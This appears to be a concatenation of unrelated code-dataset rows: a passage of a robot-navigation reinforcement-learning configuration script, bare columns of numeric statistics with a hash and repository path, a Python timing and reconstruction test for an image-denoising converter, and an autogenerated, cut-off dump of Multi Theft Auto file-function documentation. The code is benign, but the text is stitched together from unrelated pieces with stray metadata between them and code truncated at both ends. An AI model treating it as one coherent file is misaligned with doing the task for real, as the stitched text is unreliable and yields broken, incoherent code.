'observe_gremlins': False, # Gremlins are observed with lidar-like space 'observe_vision': False, # Observe vision from the robot # Constraints - flags which can be turned on # By default, no constraints are enabled, and all costs are indicator functions. 'constrain_hazards': False, # Constrain robot from being in hazardous areas 'constrain_vases': False, # Constrain frobot from touching objects 'constrain_pillars': True, # Immovable obstacles in the environment 'constrain_buttons': False, # Penalize pressing incorrect buttons 'constrain_gremlins': False, # Moving objects that must be avoided # cost discrete/continuous. As for AdamBA, I guess continuous cost is more suitable. 'constrain_indicator': False, # If true, all costs are either 1 or 0 for a given step. If false, then we get dense cost. #lidar setting 'lidar_max_dist': None, # Maximum distance for lidar sensitivity (if None, exponential distance) 'lidar_num_bins': 16, #num setting 'hazards_num': 0, 'hazards_size': args.hazards_size, 'vases_num': 0, # Pillars (immovable obstacles we should not touch) # 'robot_keepout': 0.4, 'pillars_num': 4, # Number of pillars in the world 'pillars_placements': None, # Pillars placements list (defaults to full extents) # 'pillars_locations': [], # Fixed locations to override placements 'pillars_keepout': 0.4, # Radius for placement of pillars 'pillars_size': args.pillars_size, # Half-size (radius) of pillar objects 'pillars_height': 0.5, # Half-height of pillars geoms 'pillars_cost': 1.0, # Cost (per step) for being in contact with a pillar # Frameskip is the number of physics simulation steps per environment step # Frameskip is sampled as a binomial distribution # For deterministic steps, set frameskip_binom_p = 1.0 (always take max frameskip) 'frameskip_binom_n': 10, # Number of draws trials in binomial distribution (max frameskip) 'frameskip_binom_p': 1.0 # Probability of trial return (controls distribution) } if task == "Mygoal1_pillars": config = { 'robot_base': 'xmls/point.xml', # dt in xml, default 0.002s for point 'task': 'goal', 'observation_flatten': True, # Flatten observation into a vector 'observe_sensors': True, # Observe all sensor data from simulator # Sensor observations # Specify which sensors to add to observation space 'sensors_obs': ['accelerometer', 'velocimeter', 'gyro', 'magnetometer'], 'sensors_hinge_joints': True, # Observe named joint position / velocity sensors 'sensors_ball_joints': True, # Observe named balljoint position / velocity sensors 'sensors_angle_components': True, # Observe sin/cos theta instead of theta #observe goal/box/... 'observe_goal_dist': False, # Observe the distance to the goal 'observe_goal_comp': False, # Observe a compass vector to the goal 'observe_goal_lidar': True, # Observe the goal with a lidar sensor 'observe_box_comp': False, # Observe the box with a compass 'observe_box_lidar': False, # Observe the box with a lidar 'observe_circle': False, # Observe the origin with a lidar 'observe_remaining': False, # Observe the fraction of steps remaining 'observe_walls': False, # Observe the walls with a lidar space 'observe_hazards': False, # Observe the vector from agent to hazards 'observe_vases': False, # Observe the vector from agent to vases 'observe_pillars': True, # Lidar observation of pillar object positions 'observe_buttons': False, # Lidar observation of button object positions 'observe_gremlins': False, # Gremlins are observed with lidar-like space 'observe_vision': False, # Observe vision from the robot # Constraints - flags which can be turned on # By default, no constraints are enabled, and all costs are indicator functions. 'constrain_hazards': False, # Constrain robot from being in hazardous areas 'constrain_vases': False, # Constrain frobot from touching objects 'constrain_pillars': True, # Immovable obstacles in the environment 'constrain_buttons': False, # Penalize pressing incorrect buttons 'constrain_gremlins': False, # Moving objects that must be avoided # cost discrete/continuous. As for AdamBA, I guess continuous cost is more suitable. 'constrain_indicator': False, # If true, all costs are either 1 or 0 for a given step. If false, then we get dense cost. #lidar setting 'lidar_max_dist': None, # Maximum distance for lidar sensitivity (if None, exponential distance) 'lidar_num_bins': 16, #num setting 'hazards_num': 0, 'hazards_size': args.hazards_size, 'vases_num': 0, # Pillars (immovable obstacles we should not touch) # 'robot_keepout': 0.4, 'pillars_num': 1, # Number of pillars in the world 'pillars_placements': None, # Pillars placements list (defaults to full extents) # 'pillars_locations': [], # Fixed locations to override placements 'pillars_keepout': 0.4, # Radius for placement of pillars 'pillars_size': args.pillars_size, # Half-size (radius) of pillar objects 'pillars_height': 0.5, # Half-height of pillars geoms 'pillars_cost': 1.0, # Cost (per step) for being in contact with a pillar # Frameskip is the number of physics simulation steps per environment step # Frameskip is sampled as a binomial distribution # For deterministic steps, set frameskip_binom_p = 1.0 (always take max frameskip) 'frameskip_binom_n': 10, # Number of draws trials in binomial distribution (max frameskip) 'frameskip_binom_p': 1.0 # Probability of trial return (controls distribution) } algo(env_fn=lambda: Engine(config), ac_kwargs=dict( hidden_sizes=(256, 256), ), epochs=epochs, steps_per_epoch=steps_per_epoch, save_freq=save_freq, target_kl=target_kl, cost_lim=cost_lim, seed=seed, logger_kwargs=logger_kwargs, margin=args.margin, threshold=args.threshold, ctrlrange=args.ctrlrange, # adaptive safety index, k = args.k, n = args.n, sigma = args.sigma, cpc = args.cpc, cpc_coef = args.cpc_coef, pre_execute = args.pre_execute, pre_execute_coef = args.pre_execute_coef ) if __name__ == '__main__': import argparse parser = argparse.ArgumentParser() parser.add_argument('--robot', type=str, default='Point') parser.add_argument('--task', type=str, default='myGoal1') parser.add_argument('--algo', type=str, default='ppo') parser.add_argument('--seed', type=int, default=0) parser.add_argument('--index', type=str, default='adaptive') # ['adaptive', 'projection_max', 'projection_argmin'] parser.add_argument('--k', type=float, default=2.0) parser.add_argument('--n', type=float, default=2.0) parser.add_argument('--hazards_size', type=float, default=0.30) parser.add_argument('--pillars_size', type=float, default=0.30) parser.add_argument('--sigma', type=float, default=0.04) parser.add_argument('--margin', type=float, default=0.4) parser.add_argument('--ctrlrange', type=float, default=10.0) parser.add_argument('--threshold', type=float, default=0.0) parser.add_argument('--pre_execute', type=bool, default=False) parser.add_argument('--pre_execute_coef', type=float, default=0.0) parser.add_argument('--cpc', type=bool, default=False) parser.add_argument('--cpc_coef', type=float, default=0.01) parser.add_argument('--exp_name', type=str, default='') parser.add_argument('--cpu', type=int, default=1) args = parser.parse_args() exp_name = args.exp_name if not(args.exp_name=='') else None main(args.robot, args.task, args.algo, args.seed, exp_name, args.cpu, args)
58.381271
473
0.619586
4,116
34,912
5.095481
0.076288
0.022696
0.031469
0.012969
0.892528
0.881848
0.878844
0.875316
0.868641
0.864826
0
0.011108
0.283112
34,912
598
474
58.381271
0.826874
0.43624
0
0.720222
0
0
0.265651
0.007463
0
0
0
0
0.00831
1
0.00277
false
0
0.019391
0
0.022161
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
2d5c4f2fdfe6d5f445621527a317b398c68e3889
4,558
py
Python
src/aspire/aspire/em_classavg/image_denoising/image_denoising/ConverterModel/FastModel/test.py
janden/ASPIRE-Python
5bcf831881fd0e42630c3b99671c5ed08de260ea
[ "MIT" ]
null
null
null
src/aspire/aspire/em_classavg/image_denoising/image_denoising/ConverterModel/FastModel/test.py
janden/ASPIRE-Python
5bcf831881fd0e42630c3b99671c5ed08de260ea
[ "MIT" ]
null
null
null
src/aspire/aspire/em_classavg/image_denoising/image_denoising/ConverterModel/FastModel/test.py
janden/ASPIRE-Python
5bcf831881fd0e42630c3b99671c5ed08de260ea
[ "MIT" ]
null
null
null
import numpy as np from ConverterModel.Converter import Converter from scipy.misc import imresize import time import os def test(): data_path = os.path.join(os.pardir, 'test_data', 'example_data_np_array.npy') images = np.load(data_path) num_images = images.shape[2] bandlimit_ratio = 1.0 truncation_parameter = 1 resolutions = [16, 32, 64] images_multiplier = 100 n = images_multiplier * num_images for resolution in resolutions: # testing with odd grid scaled_images = np.zeros((2 * resolution + 1, 2 * resolution + 1, num_images)) for j in range(num_images): scaled_images[:, :, j] = imresize(images[:, :, j], (2 * resolution + 1, 2 * resolution + 1)) scaled_images = np.repeat(scaled_images, images_multiplier, axis=2) print("testing images of size {}".format(scaled_images.shape[0])) tic1 = time.clock() converter = Converter(scaled_images.shape[0], truncation_parameter, beta=bandlimit_ratio) tic2 = time.clock() converter.init_fast() tic3 = time.clock() converter.init_direct() print("finished initializing the model in {} sec, the PSWF2D took {} seconds".format(tic3 - tic1, tic2 - tic1)) # test if coefficients are the same tic = time.clock() coefficients = converter.fast_forward(scaled_images) toc = time.clock() t = toc - tic tpi = t/n print("finished forwarding {} images in {} seconds, average of {} seconds per image".format(n, t, tpi)) # test reconstruction error tic = time.clock() reconstructed_images = converter.direct_backward(coefficients) toc = time.clock() t = toc - tic tpi = t / n print("finished backward of {} images in {} seconds, average of {} seconds per image".format(n, t, tpi)) x_1d_grid = range(-resolution, resolution + 1) x_2d_grid, y_2d_grid = np.meshgrid(x_1d_grid, x_1d_grid) r_2d_grid = np.sqrt(np.square(x_2d_grid) + np.square(y_2d_grid)) points_inside_the_circle = r_2d_grid <= resolution err = reconstructed_images - scaled_images e = np.mean(np.square(np.absolute(err)), axis=2) e = np.sum(e[points_inside_the_circle]) p = np.mean(np.square(np.absolute(scaled_images)), axis=2) p = np.sum(p[points_inside_the_circle]) print("odd images with resolution {} fast coefficients reconstructed error: {}\n".format(resolution, e / p)) # testing with even grid scaled_images = np.zeros((2 * resolution, 2 * resolution, num_images)) for j in range(num_images): scaled_images[:, :, j] = imresize(images[:, :, j], (2 * resolution, 2 * resolution)) scaled_images = np.repeat(scaled_images, images_multiplier, axis=2) print("testing images of size {}".format(scaled_images.shape[0])) tic1 = time.clock() converter = Converter(scaled_images.shape[0], truncation_parameter, beta=bandlimit_ratio) tic2 = time.clock() converter.init_fast() tic3 = time.clock() converter.init_direct() print("finished initializing the model in {} sec, the PSWF2D took {} seconds".format(tic3 - tic1, tic2 - tic1)) # test if coefficients are the same tic = time.clock() coefficients = converter.fast_forward(scaled_images) toc = time.clock() t = toc - tic tpi = t/n print("finished forwarding {} images in {} seconds, average of {} seconds per image".format(n, t, tpi)) # test reconstruction error tic = time.clock() reconstructed_images = converter.direct_backward(coefficients) toc = time.clock() t = toc - tic tpi = t / n print("finished backward of {} images in {} seconds, average of {} seconds per image".format(n, t, tpi)) x_1d_grid = range(-resolution, resolution) x_2d_grid, y_2d_grid = np.meshgrid(x_1d_grid, x_1d_grid) r_2d_grid = np.sqrt(np.square(x_2d_grid) + np.square(y_2d_grid)) points_inside_the_circle = r_2d_grid <= resolution err = reconstructed_images - scaled_images e = np.mean(np.square(np.absolute(err)), axis=2) e = np.sum(e[points_inside_the_circle]) p = np.mean(np.square(np.absolute(scaled_images)), axis=2) p = np.sum(p[points_inside_the_circle]) print("even images with resolution {} fast coefficients reconstructed error: {}\n".format(resolution, e / p)) test()
41.063063
119
0.637999
607
4,558
4.616145
0.176277
0.077088
0.038544
0.044968
0.8601
0.8601
0.850821
0.826552
0.826552
0.826552
0
0.02039
0.246819
4,558
110
120
41.436364
0.795805
0.035981
0
0.714286
0
0
0.153864
0.005699
0
0
0
0
0
1
0.011905
false
0
0.059524
0
0.071429
0.119048
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
2db46071150b79b9805c45839cfc3233c0e65e02
64,695
py
Python
functions/file_functions.py
mtasa-typescript/mtasa-wiki-dump
edea1746850fb6c99d6155d1d7891e2cceb33a5c
[ "MIT" ]
null
null
null
functions/file_functions.py
mtasa-typescript/mtasa-wiki-dump
edea1746850fb6c99d6155d1d7891e2cceb33a5c
[ "MIT" ]
1
2021-02-24T21:50:18.000Z
2021-02-24T21:50:18.000Z
functions/file_functions.py
mtasa-typescript/mtasa-wiki-dump
edea1746850fb6c99d6155d1d7891e2cceb33a5c
[ "MIT" ]
null
null
null
# Autogenerated file. ANY CHANGES WILL BE OVERWRITTEN from to_python.core.types import FunctionType, \ FunctionArgument, \ FunctionArgumentValues, \ FunctionReturnTypes, \ FunctionSignature, \ FunctionDoc, \ FunctionData, \ CompoundFunctionData DUMP_PARTIAL = [ CompoundFunctionData( server=[ FunctionData( signature=FunctionSignature( name='fileClose', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['bool'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Closes a file handle obtained by fileCreate or fileOpen.' , arguments={ "theFile": """The file handle to close. """ }, result='returns true if successful, false otherwise.' , ), url='fileClose', ) ], client=[ FunctionData( signature=FunctionSignature( name='fileClose', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['bool'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Closes a file handle obtained by fileCreate or fileOpen.' , arguments={ "theFile": """The file handle to close. """ }, result='returns true if successful, false otherwise.' , ), url='fileClose', ) ], ), CompoundFunctionData( server=[ FunctionData( signature=FunctionSignature( name='fileCopy', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['bool'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='filePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='copyToFilePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='overwrite', argument_type=FunctionType( names=['bool'], is_optional=True, ), default_value='false', ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='This function copies a file.{{Note|The file functions should not be used to implement configuration files. It is encouraged to use the XML functions for this instead.}}' , arguments={ "filePath": """: The path of the file you want to copy. """, "copyToFilePath": """: Where to copy the specified file to. """, "overwrite": """: If set to true it will overwrite a file that already exists at copyToFilePath. """ }, result='return true if the file was copied, else false if the filepath doesnt exist.' , ), url='fileCopy', ) ], client=[ FunctionData( signature=FunctionSignature( name='fileCopy', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['bool'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='filePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='copyToFilePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='overwrite', argument_type=FunctionType( names=['bool'], is_optional=True, ), default_value='false', ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='This function copies a file.{{Note|The file functions should not be used to implement configuration files. It is encouraged to use the XML functions for this instead.}}' , arguments={ "filePath": """: The path of the file you want to copy. """, "copyToFilePath": """: Where to copy the specified file to. """, "overwrite": """: If set to true it will overwrite a file that already exists at copyToFilePath. """ }, result='return true if the file was copied, else false if the filepath doesnt exist.' , ), url='fileCopy', ) ], ), CompoundFunctionData( server=[ FunctionData( signature=FunctionSignature( name='fileCreate', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['file'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='filePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Creates a new file in a directory of a resource. If there already exists a file with the specified name, it is overwritten with an empty file.' , arguments={ "filePath": """The filepath of the file to be created in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file. :For example, if you want to create a file named 'myfile.txt' in the resource 'mapcreator', it can be created from another resource this way: ''fileCreate(":mapcreator/myfile.txt")''. :If the file is in the current resource, only the file path is necessary, e.g. ''fileCreate("myfile.txt")''. """ }, result='if successful, returns a file handle which can be used with other file functions (filewrite, fileclose...). returns false if an error occured.' , ), url='fileCreate', ) ], client=[ FunctionData( signature=FunctionSignature( name='fileCreate', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['file'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='filePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Creates a new file in a directory of a resource. If there already exists a file with the specified name, it is overwritten with an empty file.' , arguments={ "filePath": """The filepath of the file to be created in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file. :For example, if you want to create a file named 'myfile.txt' in the resource 'mapcreator', it can be created from another resource this way: ''fileCreate(":mapcreator/myfile.txt")''. :If the file is in the current resource, only the file path is necessary, e.g. ''fileCreate("myfile.txt")''. """ }, result='if successful, returns a file handle which can be used with other file functions (filewrite, fileclose...). returns false if an error occured.' , ), url='fileCreate', ) ], ), CompoundFunctionData( server=[ FunctionData( signature=FunctionSignature( name='fileDelete', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['bool'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='filePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Deletes the specified file.' , arguments={ "filePath": """The filepath of the file to delete in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file. :For example, if you want to delete a file name "myFile.txt" in the resource 'fileres', it can be deleted from another resource this way: ''fileDelete(":fileres/myFile.txt")''. :If the file is in the current resource, only the file path is necessary, e.g. ''fileDelete("myFile.txt")''. """ }, result='returns true if successful, false otherwise (for example if there exists no file with the given name, or it does exist but is in use).' , ), url='fileDelete', ) ], client=[ FunctionData( signature=FunctionSignature( name='fileDelete', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['bool'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='filePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Deletes the specified file.' , arguments={ "filePath": """The filepath of the file to delete in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file. :For example, if you want to delete a file name "myFile.txt" in the resource 'fileres', it can be deleted from another resource this way: ''fileDelete(":fileres/myFile.txt")''. :If the file is in the current resource, only the file path is necessary, e.g. ''fileDelete("myFile.txt")''. """ }, result='returns true if successful, false otherwise (for example if there exists no file with the given name, or it does exist but is in use).' , ), url='fileDelete', ) ], ), CompoundFunctionData( server=[ FunctionData( signature=FunctionSignature( name='fileExists', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['bool'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='filePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='This functions checks whether a specified file exists inside a resource.' , arguments={ "filePath": """The filepath of the file, whose existence is going to be checked, in the following format: :resourceName/path. resourceName is the name of the resource the file is checked to be in, and path is the path from the root directory of the resource to the file. :For example, if you want to check whether a file named 'myfile.txt' exists in the resource 'mapcreator', it can be done from another resource this way: ''fileExists(":mapcreator/myfile.txt")''. :If the file, whose existence is going to be checked, is in the current resource, only the file path is necessary, e.g. ''fileExists("myfile.txt")''. Note that you must use forward slashes '/' for the folders, backslashes '\' will return false. """ }, result='returns true if the file exists, false otherwise.' , ), url='fileExists', ) ], client=[ FunctionData( signature=FunctionSignature( name='fileExists', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['bool'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='filePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='This functions checks whether a specified file exists inside a resource.' , arguments={ "filePath": """The filepath of the file, whose existence is going to be checked, in the following format: :resourceName/path. resourceName is the name of the resource the file is checked to be in, and path is the path from the root directory of the resource to the file. :For example, if you want to check whether a file named 'myfile.txt' exists in the resource 'mapcreator', it can be done from another resource this way: ''fileExists(":mapcreator/myfile.txt")''. :If the file, whose existence is going to be checked, is in the current resource, only the file path is necessary, e.g. ''fileExists("myfile.txt")''. Note that you must use forward slashes '/' for the folders, backslashes '\' will return false. """ }, result='returns true if the file exists, false otherwise.' , ), url='fileExists', ) ], ), CompoundFunctionData( server=[ FunctionData( signature=FunctionSignature( name='fileFlush', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['bool'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Forces pending disk writes to be executed. fileWrite doesnt directly write to the hard disk but places the data in a temporary buffer; only when there is enough data in the buffer it is actually written to disk. Call this function if you need the data written right now without closing the file. This is useful for log files that might want to be read while the resource is still executing. fileFlush can be called after each log entry is written. Without this, the file may appear empty or outdated to the user.' , arguments={ "theFile": """The file handle of the file you wish to flush. """ }, result='returns true if succeeded, false in case of failure (e.g. the file handle is invalid).' , ), url='fileFlush', ) ], client=[ FunctionData( signature=FunctionSignature( name='fileFlush', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['bool'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Forces pending disk writes to be executed. fileWrite doesnt directly write to the hard disk but places the data in a temporary buffer; only when there is enough data in the buffer it is actually written to disk. Call this function if you need the data written right now without closing the file. This is useful for log files that might want to be read while the resource is still executing. fileFlush can be called after each log entry is written. Without this, the file may appear empty or outdated to the user.' , arguments={ "theFile": """The file handle of the file you wish to flush. """ }, result='returns true if succeeded, false in case of failure (e.g. the file handle is invalid).' , ), url='fileFlush', ) ], ), CompoundFunctionData( server=[ FunctionData( signature=FunctionSignature( name='fileGetPath', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['string'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='This function retrieves the path of the given file.' , arguments={ "theFile": """The file you want to get the path. """ }, result='returns a string representing the file path, false if invalid file was provided.' , ), url='fileGetPath', ) ], client=[ FunctionData( signature=FunctionSignature( name='fileGetPath', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['string'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='This function retrieves the path of the given file.' , arguments={ "theFile": """The file you want to get the path. """ }, result='returns a string representing the file path, false if invalid file was provided.' , ), url='fileGetPath', ) ], ), CompoundFunctionData( server=[ FunctionData( signature=FunctionSignature( name='fileGetPos', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['int'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Returns the current read/write position in the given file.' , arguments={ "theFile": """the file handle you wish to get the position of. """ }, result='returns the file position if successful, or false if an error occured (e.g. an invalid handle was passed).' , ), url='fileGetPos', ) ], client=[ FunctionData( signature=FunctionSignature( name='fileGetPos', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['int'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Returns the current read/write position in the given file.' , arguments={ "theFile": """the file handle you wish to get the position of. """ }, result='returns the file position if successful, or false if an error occured (e.g. an invalid handle was passed).' , ), url='fileGetPos', ) ], ), CompoundFunctionData( server=[ FunctionData( signature=FunctionSignature( name='fileGetSize', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['int'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Returns the total size in bytes of the given file.' , arguments={ "theFile": """the file handle you wish to get the size of. """ }, result='returns the file size if successful, or false if an error occured (e.g. an invalid file handle was passed).' , ), url='fileGetSize', ) ], client=[ FunctionData( signature=FunctionSignature( name='fileGetSize', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['int'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Returns the total size in bytes of the given file.' , arguments={ "theFile": """the file handle you wish to get the size of. """ }, result='returns the file size if successful, or false if an error occured (e.g. an invalid file handle was passed).' , ), url='fileGetSize', ) ], ), CompoundFunctionData( server=[ FunctionData( signature=FunctionSignature( name='fileIsEOF', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['bool'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Checks if the file position is at the end of the file.' , arguments={ "theFile": """A handle to the file you wish to check. """ }, result='returns true if the file position of the specified file is at the end of the file, false otherwise.' , ), url='fileIsEOF', ) ], client=[ FunctionData( signature=FunctionSignature( name='fileIsEOF', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['bool'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Checks if the file position is at the end of the file.' , arguments={ "theFile": """A handle to the file you wish to check. """ }, result='returns true if the file position of the specified file is at the end of the file, false otherwise.' , ), url='fileIsEOF', ) ], ), CompoundFunctionData( server=[ FunctionData( signature=FunctionSignature( name='fileOpen', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['file'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='filePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='readOnly', argument_type=FunctionType( names=['bool'], is_optional=True, ), default_value='false', ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Opens an existing file for reading and writing.' , arguments={ "filePath": """The filepath of the file in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file. :For example, if there is a file named 'coolObjects.txt' in the resource 'objectSearch', it can be opened from another resource this way: ''fileOpen(":objectSearch/coolObjects.txt")''. :If the file is in the current resource, only the file path is necessary, e.g. ''fileOpen("coolObjects.txt")''. """, "readOnly": """By default, the file is opened with reading and writing access. You can specify true for this parameter if you only need reading access. """ }, result='if successful, returns a file handle for the file. otherwise returns false (f.e. if the file doesnt exist).' , ), url='fileOpen', ) ], client=[ FunctionData( signature=FunctionSignature( name='fileOpen', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['file'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='filePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='readOnly', argument_type=FunctionType( names=['bool'], is_optional=True, ), default_value='false', ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Opens an existing file for reading and writing.' , arguments={ "filePath": """The filepath of the file in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file. :For example, if there is a file named 'coolObjects.txt' in the resource 'objectSearch', it can be opened from another resource this way: ''fileOpen(":objectSearch/coolObjects.txt")''. :If the file is in the current resource, only the file path is necessary, e.g. ''fileOpen("coolObjects.txt")''. """, "readOnly": """By default, the file is opened with reading and writing access. You can specify true for this parameter if you only need reading access. """ }, result='if successful, returns a file handle for the file. otherwise returns false (f.e. if the file doesnt exist).' , ), url='fileOpen', ) ], ), CompoundFunctionData( server=[ FunctionData( signature=FunctionSignature( name='fileRead', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['string'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='count', argument_type=FunctionType( names=['int'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Reads the specified number of bytes from the given file starting at its current read/write position, and returns them as a string.' , arguments={ "theFile": """A handle to the file you wish to read from. Use fileOpen to obtain this handle. """, "count": """The number of bytes you wish to read. """ }, result='returns the bytes that were read in a string. note that this string might not contain as many bytes as you specified if an error occured, i.e. end of file.' , ), url='fileRead', ) ], client=[ FunctionData( signature=FunctionSignature( name='fileRead', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['string'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='count', argument_type=FunctionType( names=['int'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ 